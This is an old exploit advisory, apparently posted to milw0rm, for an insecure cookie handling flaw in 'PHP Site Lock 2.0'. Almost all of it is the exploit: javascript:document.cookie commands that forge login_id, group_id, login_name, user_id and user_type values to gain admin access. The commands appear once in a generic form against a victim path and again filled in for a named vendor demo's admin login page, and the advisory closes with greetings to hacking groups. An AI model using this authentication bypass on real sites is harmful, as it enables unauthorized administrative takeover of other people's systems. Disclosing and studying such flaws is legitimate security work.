-------------------------------------[+] Homepage:http://www.kalptarudemos.com Product: PHP Site Lock 2.0 home:www.h4ckf0ru.com ------------------------------------- PHP Site Lock 2.0 Insecure Cookie Handling Vuln ------------------------------------- Exploit: -------- 1)javascript:document.cookie="login_id=0;path=/"; 1)javascript:document.cookie="group_id=[id grroup admin];path=/"; 2)javascript:document.cookie="login_name=[admin name];path=/"; 3)javascript:document.cookie="user_id=[user id ];path=/"; 4)javascript:document.cookie="user_type=[admin Type];path=/"; Then Go to url: http://victim/[path]/index.php demo ---- http://www.kalptarudemos.com/demo/phpsitelock/index.php?page=adminlogin exploit for dem0 ---------------- 1)javascript:document.cookie="login_id=0;path=/"; 2)javascript:document.cookie="group_id=1;path=/"; 3)javascript:document.cookie="login_name=admin;path=/"; 4)javascript:document.cookie="user_id=1;path=/"; 5)javascript:document.cookie="user_type=admin;path=/"; Note: The operation is not worked by assemble The Information :) Put it one after one :) -------------------------------------------------- Greetz to : [+] Super_Cristal (My Master) - His0k4- Dos-Dz Team Snakes TeaM SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu ALL My Friends (Dz) [+]-------------------------------------[+] # milw0rm.com [2009-05-04]